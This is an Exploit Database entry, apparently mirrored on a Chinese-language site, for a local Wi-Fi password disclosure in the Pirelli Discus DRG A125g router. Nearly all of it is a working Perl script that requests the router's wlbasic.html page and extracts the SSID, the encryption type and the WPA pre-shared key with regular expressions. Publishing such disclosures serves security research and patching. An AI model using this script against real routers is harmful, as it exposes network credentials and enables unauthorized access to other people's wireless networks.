Pirelli Discus DRG A125g – Local Password Disclosure

• Exploit Database
• 13 阅读

• 作者： Sebastián Magof
  日期： 2013-11-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/29795/

• #!/usr/bin/perl 
  
  #Author: Sebastián Magof
  
  #Hardware: pirelli discus DRG A125g
  
  #Vulnerable file: wlbasic.html
  
  #Bug: Wifi Password Disclosure
  
  #Type: Local
  
  # (\/)
  
  # (**) ±lpha
  
  #(")(")
  
  #usage:perl exploit.pl
  
  use LWP::UserAgent;
  
  use HTTP::Request;
  
  #begin
  
  print "\n\n************************************************************\n";
  
  print "*Pirelli Discus ADSL DRG A125g Wifi password disclosure*\n";
  
  print "************************************************************\n\n";
  
  
  
  #wifi pwd disclosure file
  
  my $url = "http://10.0.0.2/wlbasic.html";
  
  
  
  #UserAgent
  
  my $ua = LWP::UserAgent->new();
  
  $ua->agent("Mozilla/5.0");
  
  
  
  #Request.
  
  my $req = HTTP::Request->new(GET => $url);
  
  my $request = $ua->request($req);
  
  my $content = $request->content(); #content
  
  my ($ssi) = $content =~ m/ssid = '(.+)'/;
  
  my ($pwd) = $content =~ m/wpaPskKey = '(.+)'/;
  
  my ($enc) = $content =~ m/var wpa = '(.+)'/;
  
  #ssid+encryption method+pwd;
  
  print "Ssid: $ssi\n";
  
  print "Encryption method: $enc\n";
  
  print "Password: $pwd\n\n";
  
  exit(0);
  
  
  
  __EOF__